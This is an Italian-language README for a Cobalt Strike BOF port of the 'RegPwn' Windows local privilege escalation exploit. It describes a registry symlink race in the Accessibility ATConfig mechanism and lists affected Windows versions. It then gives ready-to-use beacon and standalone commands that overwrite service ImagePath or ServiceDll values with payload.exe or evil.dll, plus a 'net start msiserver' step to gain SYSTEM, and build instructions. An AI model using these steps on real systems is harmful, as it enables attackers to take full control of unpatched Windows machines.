
Bof di RegPwn di MDSec
Porting BOF di Cobalt Strike dell'exploit RegPwn di Filip Dragovic (@Wh04m1001) / MDSec ActiveBreach.
Questa è una rozza reimplementazione BOF dell'exploit originale in C#. Tutto il merito per la ricerca della vulnerabilità e l'exploit va a Filip Dragovic e MDSec.
Sfrutta una race condition di symlink del registro nel meccanismo ATConfig dell'Accessibilità di Windows per scrivere valori arbitrari in chiavi di registro HKLM protette da un contesto utente normale (Escalation di Privilegi Locale).
Target: Windows 11 25H2/24H2, Windows 10 21H2 e Windows Server 2016/2019/2022 prima della patch di marzo 2026.
AVVERTENZA: Questo exploit blocca la workstation come parte della race condition.
Il servizio msiserver (Windows Installer) ImagePath. Questo servizio viene eseguito come SYSTEM e può essere avviato da utenti normali.
Carica regpwn.cna in Script Manager, quindi:
beacon> regpwn "cmd.exe /c C:\Programdata\payload.exe"
beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll
regpwn.x64.exe "cmd.exe /c C:\Programdata\payload.exe"
regpwn.x64.exe C:\payload.exe SYSTEM\CurrentControlSet\Services\OtherService ImagePath
Dopo che l'exploit ha avuto successo, avvia il servizio per eseguire come SYSTEM:
net start msiserver
Richiede x86_64-w64-mingw32-gcc (cross compiler MinGW-w64).
make # build BOF (regpwn.x64.o)
make test # build standalone EXE (regpwn.x64.exe)
make clean
Solo x64.